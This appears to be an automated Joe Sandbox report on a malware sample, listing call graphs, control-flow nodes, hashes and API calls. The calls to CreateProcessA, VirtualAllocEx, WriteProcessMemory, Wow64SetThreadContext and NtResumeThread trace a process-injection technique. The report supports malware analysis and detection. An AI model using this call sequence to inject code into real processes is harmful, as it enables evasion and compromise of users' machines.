81237 682760a 2 API calls 81232->81237 81238 6827b6b 2 API calls 81232->81238 81239 68287c8 2 API calls 81232->81239 81240 6827868 2 API calls 81232->81240 81241 6827fa9 2 API calls 81232->81241 81242 6827c7f 2 API calls 81232->81242 81243 682824d 2 API calls 81232->81243 81233 682743f 81233->81214 81234->81233 81235->81233 81236->81233 81237->81233 81238->81233 81239->81233 81240->81233 81241->81233 81242->81233 81243->81233 81245 68276bf 81244->81245 81295 682fcb8 81245->81295 81299 682fcb1 81245->81299 81246 68275d8 81250 6828257 81249->81250 81303 682fa18 81250->81303 81307 682fa10 81250->81307 81251 68282f3 81251->81219 81255 6827fc1 81254->81255 81311 6828cf8 81255->81311 81316 6828d08 81255->81316 81256 6827fd9 81260 6827c89 81259->81260 81339 714f5f8 81260->81339 81343 714f600 81260->81343 81261 68275d8 81265 68287d7 81264->81265 81347 682f410 81265->81347 81351 682f409 81265->81351 81266 6828803 81270 682786e 81269->81270 81272 682fcb1 WriteProcessMemory 81270->81272 81273 682fcb8 WriteProcessMemory 81270->81273 81271 682791d 81271->81219 81272->81271 81273->81271 81275 6827619 81274->81275 81277 682fcb1 WriteProcessMemory 81275->81277 81278 682fcb8 WriteProcessMemory 81275->81278 81276 68275d8 81276->81219 81277->81276 81278->81276 81280 6827b78 81279->81280 81282 714f600 NtResumeThread 81280->81282 81283 714f5f8 NtResumeThread 81280->81283 81281 68275d8 81282->81281 81283->81281 81285 6827d80 81284->81285 81287 682f410 Wow64SetThreadContext 81285->81287 81288 682f409 Wow64SetThreadContext 81285->81288 81286 6827dac 81287->81286 81288->81286 81290 6827a2e 81289->81290 81291 68275d8 81290->81291 81293 682fa10 VirtualAllocEx 81290->81293 81294 682fa18 VirtualAllocEx 81290->81294 81292 68282f3 81292->81219 81293->81292 81294->81292 81296 682fd00 WriteProcessMemory 81295->81296 81298 682fd57 81296->81298 81298->81246 81300 682fcb8 WriteProcessMemory 81299->81300 81302 682fd57 81300->81302 81302->81246 81304 682fa58 VirtualAllocEx 81303->81304 81306 682fa95 81304->81306 81306->81251 81308 682fa18 VirtualAllocEx 81307->81308 81310 682fa95 81308->81310 81310->81251 81312 6828d09 81311->81312 81313 6828d41 81312->81313 81321 682906f 81312->81321 81326 6828ff3 81312->81326 81313->81256 81317 6828d1f 81316->81317 81318 6828d41 81317->81318 81319 6828ff3 2 API calls 81317->81319 81320 682906f 2 API calls 81317->81320 81318->81256 81319->81318 81320->81318 81322 6829097 81321->81322 81331 682ec45 81322->81331 81335 682ec50 81322->81335 81327 6829002 81326->81327 81329 682ec50 CreateProcessA 81327->81329 81330 682ec45 CreateProcessA 81327->81330 81328 682974b 81329->81328 81330->81328 81332 682ec50 CreateProcessA 81331->81332 81334 682ee3c 81332->81334 81336 682ecb4 CreateProcessA 81335->81336 81338 682ee3c 81336->81338 81338->81338 81340 714f600 NtResumeThread 81339->81340 81342 714f67d 81340->81342 81342->81261 81344 714f648 NtResumeThread 81343->81344 81346 714f67d 81344->81346 81346->81261 81348 682f455 Wow64SetThreadContext 81347->81348 81350 682f49d 81348->81350 81350->81266 81352 682f410 Wow64SetThreadContext 81351->81352 81354 682f49d 81352->81354 81354->81266 81004 125c938 81005 125c980 GetModuleHandleW 81004->81005 81006 125c97a 81004->81006 81007 125c9ad 81005->81007 81006->81005 81355 e6d118 81356 e6d130 81355->81356 81357 e6d18b 81356->81357 81360 6f71448 81356->81360 81365 6f7143c 81356->81365 81361 6f71470 81360->81361 81370 6f718d8 81361->81370 81375 6f718c8 81361->81375 81362 6f71497 81362->81362 81366 6f71470 81365->81366 81368 6f718d8 2 API calls 81366->81368 81369 6f718c8 2 API calls 81366->81369 81367 6f71497 81367->81367 81368->81367 81369->81367 81371 6f71905 81370->81371 81372 6f705d8 2 API calls 81371->81372 81374 6f71a9b 81371->81374 81373 6f71a8c 81372->81373 81373->81362 81374->81362 81376 6f71905 81375->81376 81377 6f705d8 2 API calls 81376->81377 81379 6f71a9b 81376->81379 81378 6f71a8c 81377->81378 81378->81362 81379->81362

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 420 6f76ab8-6f76af6 421 6f76afd-6f76c1f 420->421 422 6f76af8 420->422 426 6f76c43-6f76c4f 421->426 427 6f76c21-6f76c37 421->427 422->421 428 6f76c56-6f76c5b 426->428 429 6f76c51 426->429 704 6f76c3d call 6f79658 427->704 705 6f76c3d call 6f79648 427->705 431 6f76c93-6f76cdc 428->431 432 6f76c5d-6f76c69 428->432 429->428 440 6f76ce3-6f76fa8 431->440 441 6f76cde 431->441 433 6f76c70-6f76c8e 432->433 434 6f76c6b 432->434 435 6f783f7-6f783fd 433->435 434->433 437 6f783ff-6f7841f 435->437 438 6f78428 435->438 437->438 467 6f779d8-6f779e4 440->467 441->440 468 6f76fad-6f76fb9 467->468 469 6f779ea-6f77a22 467->469 470 6f76fc0-6f770e5 468->470 471 6f76fbb 468->471 478 6f77afc-6f77b02 469->478 506 6f770e7-6f7711f 470->506 507 6f77125-6f771ae 470->507 471->470 479 6f77a27-6f77aa4 478->479 480 6f77b08-6f77b40 478->480 495 6f77ad7-6f77af9 479->495 496 6f77aa6-6f77aaa 479->496 490 6f77e9e-6f77ea4 480->490 492 6f77b45-6f77d47 490->492 493 6f77eaa-6f77ef2 490->493 587 6f77de6-6f77dea 492->587 588 6f77d4d-6f77de1 492->588 501 6f77ef4-6f77f67 493->501 502 6f77f6d-6f77fb8 493->502 495->478 496->495 500 6f77aac-6f77ad4 496->500 500->495 501->502 525 6f783c1-6f783c7 502->525 506->507 534 6f771b0-6f771b8 507->534 535 6f771bd-6f77241 507->535 527 6f77fbd-6f7803f 525->527 528 6f783cd-6f783f5 525->528 546 6f78067-6f78073 527->546 547 6f78041-6f7805c 527->547 528->435 537 6f779c9-6f779d5 534->537 562 6f77243-6f7724b 535->562 563 6f77250-6f772d4 535->563 537->467 549 6f78075 546->549 550 6f7807a-6f78086 546->550 547->546 549->550 553 6f78099-6f780a8 550->553 554 6f78088-6f78094 550->554 558 6f780b1-6f78389 553->558 559 6f780aa 553->559 557 6f783a8-6f783be 554->557 557->525 591 6f78394-6f783a0 558->591 559->558 564 6f780b7-6f78120 559->564 565 6f78125-6f7819d 559->565 566 6f781a2-6f7820b 559->566 567 6f78210-6f78279 559->567 568 6f7827e-6f782e6 559->568 562->537 610 6f772d6-6f772de 563->610 611 6f772e3-6f77367 563->611 564->591 565->591 566->591 567->591 598 6f7835a-6f78360 568->598 593 6f77e47-6f77e84 587->593 594 6f77dec-6f77e45 587->594 612 6f77e85-6f77e9b 588->612 591->557 593->612 594->612 603 6f78362-6f7836c 598->603 604 6f782e8-6f78346 598->604 603->591 615 6f7834d-6f78357 604->615 616 6f78348 604->616 610->537 625 6f77376-6f773fa 611->625 626 6f77369-6f77371 611->626 612->490 615->598 616->615 632 6f773fc-6f77404 625->632 633 6f77409-6f7748d 625->633 626->537 632->537 639 6f7748f-6f77497 633->639 640 6f7749c-6f77520 633->640 639->537 646 6f77522-6f7752a 640->646 647 6f7752f-6f775b3 640->647 646->537 653 6f775b5-6f775bd 647->653 654 6f775c2-6f77646 647->654 653->537 660 6f77655-6f776d9 654->660 661 6f77648-6f77650 654->661 667 6f776db-6f776e3 660->667 668 6f776e8-6f7776c 660->668 661->537 667->537 674 6f7776e-6f77776 668->674 675 6f7777b-6f777ff 668->675 674->537 681 6f77801-6f77809 675->681 682 6f7780e-6f77892 675->682 681->537 688 6f77894-6f7789c 682->688 689 6f778a1-6f77925 682->689 688->537 695 6f77927-6f7792f 689->695 696 6f77934-6f779b8 689->696 695->537 702 6f779c4-6f779c6 696->702 703 6f779ba-6f779c2 696->703 702->537 703->537 704->426 705->426
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362950294.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6f70000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 2
                                                                                                            • API String ID: 0-450215437
                                                                                                            • Opcode ID: 824a75beee09fef5c69fa234057a1d97270822a90d4985cf7f6c394143623c4e
                                                                                                            • Instruction ID: abcd2ac37a7e1e2a23cfe71d8e82598f23fa5b32c82bae69b9501c7d12af2809
                                                                                                            • Opcode Fuzzy Hash: 824a75beee09fef5c69fa234057a1d97270822a90d4985cf7f6c394143623c4e
                                                                                                            • Instruction Fuzzy Hash: D3E2D174A002288FDB65DF68D984B9EBBF6FB89301F5085EAD509A7344EB305E85CF50
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366827807.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6fd0000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4
                                                                                                            • API String ID: 0-4088798008
                                                                                                            • Opcode ID: 04375f782ce1bce707dc1808bb741e764a30074505f2b1616a9099c5e530cac5
                                                                                                            • Instruction ID: 9801b49282ff5e828e0278b6ec864b16080f335c3ad7b5804e97f34a474009e6
                                                                                                            • Opcode Fuzzy Hash: 04375f782ce1bce707dc1808bb741e764a30074505f2b1616a9099c5e530cac5
                                                                                                            • Instruction Fuzzy Hash: 88B2F735E00228CFDB54DFA5C894BADB7B6BF48300F198199E505AB3A9DB70AD85CF50
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366827807.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6fd0000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4
                                                                                                            • API String ID: 0-4088798008
                                                                                                            • Opcode ID: 9186e4e0f437df4599667283476eb5f15669a8c5a7f25601d638327a70bd0352
                                                                                                            • Instruction ID: 5dada74e1a7a4befbc18e4ae837960dd4b6360343490dbfe697be166a500478c
                                                                                                            • Opcode Fuzzy Hash: 9186e4e0f437df4599667283476eb5f15669a8c5a7f25601d638327a70bd0352
                                                                                                            • Instruction Fuzzy Hash: 6F221A34E00219CFDB64DFA5C994BADB7B6BF48300F1481A9E509AB3A5DB70AD85CF50

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1682 682dde2-682de7e NtProtectVirtualMemory 1686 682de80-682de86 1682->1686 1687 682de87-682deac 1682->1687 1686->1687
                                                                                                            APIs
                                                                                                            • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0682DE71
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2360678028.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6820000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 2706961497-0
                                                                                                            • Opcode ID: f323e2edaedaadabf1a9c22f297342c6059835b80747bb7caeeb19e14f23856b
                                                                                                            • Instruction ID: dcc5adec9f500ef94228d7e8ca5007fe6c63b1c8b117e8d4dc8316706b2e01a4
                                                                                                            • Opcode Fuzzy Hash: f323e2edaedaadabf1a9c22f297342c6059835b80747bb7caeeb19e14f23856b
                                                                                                            • Instruction Fuzzy Hash: 682103B5D013499FDB10DFAAD981AEEFBF5FF48310F20842AE519A7210C7759940CBA5
                                                                                                            APIs
                                                                                                            • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0682DE71
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2360678028.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6820000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 2706961497-0
                                                                                                            • Opcode ID: c039abb68fbee184625359336278a4e9a90bcd7e624225046d5ecda125309f2e
                                                                                                            • Instruction ID: fcec9cb76ceaa7e72e2baf28f663c017053ab4f615c19c76ff8a30f4e459bc81
                                                                                                            • Opcode Fuzzy Hash: c039abb68fbee184625359336278a4e9a90bcd7e624225046d5ecda125309f2e
                                                                                                            • Instruction Fuzzy Hash: 942103B1D013499FDB10DFAAD980ADEFBF5FF48310F20842AE519A7210C7759900CBA5
                                                                                                            APIs
                                                                                                            • NtResumeThread.NTDLL(?,?), ref: 0714F66E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2367400518.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7140000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ResumeThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 947044025-0
                                                                                                            • Opcode ID: 00f76ca75de579b82c93754ebbf988c084db517e9bf17bc056baf573558f7ff2
                                                                                                            • Instruction ID: 4f5306aafeebce4500703c123eade4a236c58b84e07d17a66f8ac78b5a463b4e
                                                                                                            • Opcode Fuzzy Hash: 00f76ca75de579b82c93754ebbf988c084db517e9bf17bc056baf573558f7ff2
                                                                                                            • Instruction Fuzzy Hash: C31136B1D003499FDB10DFAAC481BEEFBF8EF89210F14842AD419A7250CB789945CFA5
                                                                                                            APIs
                                                                                                            • NtResumeThread.NTDLL(?,?), ref: 0714F66E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2367400518.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7140000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ResumeThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 947044025-0
                                                                                                            • Opcode ID: 08bd83cdb506f8b450d1715de065bc4ab30c740d28a6700744b28db596782eea
                                                                                                            • Instruction ID: b64b3305c80ba13e1cf777951d8abf14113cf20f0a86ec79d568172450e98aa5
                                                                                                            • Opcode Fuzzy Hash: 08bd83cdb506f8b450d1715de065bc4ab30c740d28a6700744b28db596782eea
                                                                                                            • Instruction Fuzzy Hash: 061117B1D003499FDB10DFAAC485B9FFBF8AF89210F14842AD419A7250C7789905CFA5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2360678028.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6820000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: h
                                                                                                            • API String ID: 0-2439710439
                                                                                                            • Opcode ID: 8c620ef9b57ad34bac806ad70a78ee2087e3059467a5485e8896f36d08b0df83
                                                                                                            • Instruction ID: 234392910bdd6a0628f1da9838fc401b6da14c1e6799d523e03e972d5e8c2122
                                                                                                            • Opcode Fuzzy Hash: 8c620ef9b57ad34bac806ad70a78ee2087e3059467a5485e8896f36d08b0df83
                                                                                                            • Instruction Fuzzy Hash: A2711675D006298FEB64DF69C850BD9B7B2FF89304F1081AAD519B7244EB305E85CF50
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2360678028.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6820000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 8
                                                                                                            • API String ID: 0-4194326291
                                                                                                            • Opcode ID: 1d535bf67574781fb8171491f802549c9533b6acc7499276786c4eb4db42788f
                                                                                                            • Instruction ID: b22cfe254765fb622c8277179ebf31f0301a1accfd1da3b0a4622d51e8880170
                                                                                                            • Opcode Fuzzy Hash: 1d535bf67574781fb8171491f802549c9533b6acc7499276786c4eb4db42788f
                                                                                                            • Instruction Fuzzy Hash: 44611571D006288BEB64DF69C950AD9B7B2FF89300F1082AAD50DB7244EB306E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362950294.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6f70000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 101da6bf7d30fc77bcd12dfe71a39bf5586f422aa18e497bdcf723990d3f73d1
                                                                                                            • Instruction ID: e6a023dbe943ba7148a2d2818eda36c35634872796fc72e67cdff53ce9a4ee6f
                                                                                                            • Opcode Fuzzy Hash: 101da6bf7d30fc77bcd12dfe71a39bf5586f422aa18e497bdcf723990d3f73d1
                                                                                                            • Instruction Fuzzy Hash: 64A2B375E00628CFDB64CF69C984A99BBB2FF89304F1581E9D509AB365DB319E81CF40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2367400518.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7140000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 807302041664db28e033c5f3f39bcc45f17fcb01469dea75e5eb75505b9f2fb7
                                                                                                            • Instruction ID: 34c00c82c627a78b3a07904d421ae406da8df900092b43af44d8d05644e47d24
                                                                                                            • Opcode Fuzzy Hash: 807302041664db28e033c5f3f39bcc45f17fcb01469dea75e5eb75505b9f2fb7
                                                                                                            • Instruction Fuzzy Hash: 2D3279B4B0071A9FCB19CFA9C49466EFBF2BF89301F148529D52AD7391DB30A941CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366827807.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6fd0000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ac8af081974e1737a83ac5813f3e2630f2560db3687ce85a1aaac526115ddaef
                                                                                                            • Instruction ID: f514d4c80f91cce6641540dddfc4386f3b87ce8d6288f37ecacc6e93a9ab3231
                                                                                                            • Opcode Fuzzy Hash: ac8af081974e1737a83ac5813f3e2630f2560db3687ce85a1aaac526115ddaef
                                                                                                            • Instruction Fuzzy Hash: 84222734B006058FDB54DF29C884A6ABBF7BF89301B1984A9E506DB3A5DB71EC41CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362950294.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6f70000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 45238db999a60ad4b92ed423caefce8eaa63f66e96cc37e1bda7a40eef22a405
                                                                                                            • Instruction ID: bcdf1ecf8d510c8a512a014c46fc4349903acd8ef64b14aa0a1972bef2bd572c
                                                                                                            • Opcode Fuzzy Hash: 45238db999a60ad4b92ed423caefce8eaa63f66e96cc37e1bda7a40eef22a405
                                                                                                            • Instruction Fuzzy Hash: 3352C174A00628CFDB60DF28C984B9ABBB6FB49301F5085E9D90DA7355DB30AE81CF55
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366998808.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7070000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 95e610ba0b63934aa0adcdd12d967dcc7375952f8e7a1401c23e06f14af3ddf4
                                                                                                            • Instruction ID: 611306650d9b84fefc7cb701fd66c0f3db37aea46abcda3be03c5318afb24275
                                                                                                            • Opcode Fuzzy Hash: 95e610ba0b63934aa0adcdd12d967dcc7375952f8e7a1401c23e06f14af3ddf4
                                                                                                            • Instruction Fuzzy Hash: EE1222B4E04219CFDB64DF69D980BADB7F6BB89300F1081A9D519E7744DB70AA86CF04
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2367400518.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7140000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ca8a687218bd006bd47980e5fe80cc997f15d92624108a8219a731c435410b38
                                                                                                            • Instruction ID: 92391802cde3009d33aa841bd6d7a8080d45a9848bbc3ba7b54c03ec762aafbc
                                                                                                            • Opcode Fuzzy Hash: ca8a687218bd006bd47980e5fe80cc997f15d92624108a8219a731c435410b38
                                                                                                            • Instruction Fuzzy Hash: 23C114B4A14218CFEB28DFA4D994BADBBF2FB4A304F608069D409B7384DB745985CF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2360678028.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6820000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 846414b07b4473151b113a21ce9004cb61d2616939991a7398ef34b836eb7076
                                                                                                            • Instruction ID: 17fa3e493e661719cd6cfaca04f4117d0a789fe9f7999ff0cf940c96ea0087c7
                                                                                                            • Opcode Fuzzy Hash: 846414b07b4473151b113a21ce9004cb61d2616939991a7398ef34b836eb7076
                                                                                                            • Instruction Fuzzy Hash: 81C11474E01229CFEB94DF69D984BADB7F2BB49304F2080A9D409E7294EB705D85CF40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2360678028.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6820000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 81baf812f143c5e86999a96981d4514f323fa7cecde9f4cb65a20576684c41ce
                                                                                                            • Instruction ID: 207db119b1c3f1597e36c72a20967886ae8f56e8ecd1a06773f3838948bdd53e
                                                                                                            • Opcode Fuzzy Hash: 81baf812f143c5e86999a96981d4514f323fa7cecde9f4cb65a20576684c41ce
                                                                                                            • Instruction Fuzzy Hash: F5C11374E01229CFEB94DF69D984BADB7F6BB89304F2080A9D409E7294EB705985CF41
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2367527778.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7470000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a23d014f34966aded5ef58ff2dc43c6070b83b2021a59410cbcd086f59b2397e
                                                                                                            • Instruction ID: b75b964ecd88aa42068a1d4fbba689ac90624fa166a1b6d2ae5e09837fecf70a
                                                                                                            • Opcode Fuzzy Hash: a23d014f34966aded5ef58ff2dc43c6070b83b2021a59410cbcd086f59b2397e
                                                                                                            • Instruction Fuzzy Hash: 04D1C374E01259CFDB54DFA9D980A9DBBB2FF88300F2081A9E509AB365DB319D85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366998808.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7070000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1349ae236809ee97ea1e707fda6c3ee76d2b01ffc2f0a804367a6157573cb531
                                                                                                            • Instruction ID: f2043a4a655bfed41369e965befb0650ab71bc7ccc4a4ddfd808dd87df262536
                                                                                                            • Opcode Fuzzy Hash: 1349ae236809ee97ea1e707fda6c3ee76d2b01ffc2f0a804367a6157573cb531
                                                                                                            • Instruction Fuzzy Hash: 50A115B4E01208CFDB54CFA9D884BADBBF6BF89344F209169E019EB255DB709981CF04
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366998808.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7070000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7ea9e012557180d21000f305c78268f085c9b311d3572a099b4873332d6367b2
                                                                                                            • Instruction ID: 4e2d248a124ac174d93315ea417ecdebf7ceb6266c3a863873f3c01ee5cae26f
                                                                                                            • Opcode Fuzzy Hash: 7ea9e012557180d21000f305c78268f085c9b311d3572a099b4873332d6367b2
                                                                                                            • Instruction Fuzzy Hash: B5A115B4E05208CFDB54CFA9D984BADBBF6BF49344F20A169D019EB255DB709981CF04
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2360678028.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6820000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e7e8183a889b01ced44abda11623658d858b7911de9f144428da25acfeada04f
                                                                                                            • Instruction ID: 9880735baebe647d6edd6d6d2f83a32dc441f62664b885aa753998fcff16143c
                                                                                                            • Opcode Fuzzy Hash: e7e8183a889b01ced44abda11623658d858b7911de9f144428da25acfeada04f
                                                                                                            • Instruction Fuzzy Hash: 6781F2B4E00209DFDB44DFA9D591AAEBBF5BF89300F108429E519EB354DB74A986CF40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2360678028.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6820000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9dc262448d1d637e589c3d871d671300eff0b2abf19d7dfbe1ac4522acebcb4a
                                                                                                            • Instruction ID: 3db76bfcb7eb280faaf821688ab402ac1a931e12da04cd2eb51b060f6fb8e297
                                                                                                            • Opcode Fuzzy Hash: 9dc262448d1d637e589c3d871d671300eff0b2abf19d7dfbe1ac4522acebcb4a
                                                                                                            • Instruction Fuzzy Hash: 7D71D270E00219DFDB44DFA9D491AAEBBF5BF89300F108429E519EB354DB74A985CF90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362950294.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6f70000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 59cd30ab5197466a33be4260ebed4f36d01512e4e44c93628383160fc7954323
                                                                                                            • Instruction ID: 7f54aa06b6f7c3313e49276a117a3edd75c46059cf1c79ebdaf5b999044e8e70
                                                                                                            • Opcode Fuzzy Hash: 59cd30ab5197466a33be4260ebed4f36d01512e4e44c93628383160fc7954323
                                                                                                            • Instruction Fuzzy Hash: 81310772D05658DFEB98CF5AC8406DDFBB6AFD9305F14C0AAD809AB269DB304A45CF40

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0125EA5E
                                                                                                            • GetCurrentThread.KERNEL32 ref: 0125EA9B
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0125EAD8
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0125EB31
                                                                                                            Memory Dump Source
